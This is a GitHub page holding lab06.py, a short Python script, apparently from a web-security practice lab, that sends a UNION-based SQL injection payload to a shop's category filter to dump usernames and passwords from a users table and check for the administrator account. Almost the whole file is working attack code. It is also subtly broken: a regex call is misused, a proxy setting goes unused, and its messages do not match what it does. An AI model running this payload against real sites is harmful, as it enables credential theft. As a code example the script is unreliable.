-
Notifications
You must be signed in to change notification settings - Fork 0
/
lab06.py
38 lines (32 loc) · 1.03 KB
/
lab06.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
import urllib3
import sys
from bs4 import BeautifulSoup
import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'https':'127.0.0.1:8080'}
def exploit_table(url):
uri = "filter?category=Pets"
sql_payload = "'UNION select NULL,username || '-' ||password from users--"
r = requests.get(url+uri+sql_payload, verify=False)
res = r.text
password = ""
username = ""
if "administrator" in res:
soup = BeautifulSoup(res,'html.parser')
columns = soup.findAll('th', text = re.compile('administrator.*').split("-"))
print(columns)
return True
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
except IndexError:
print('[-] Usage: %s <url> <sql-payload>' % sys.argv[0])
print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])
sys.exit(-1)
print(f"[+] Figuring out number of columns.")
if exploit_table(url):
print("SUCCESS!!!")
else:
print("FAILURE!!")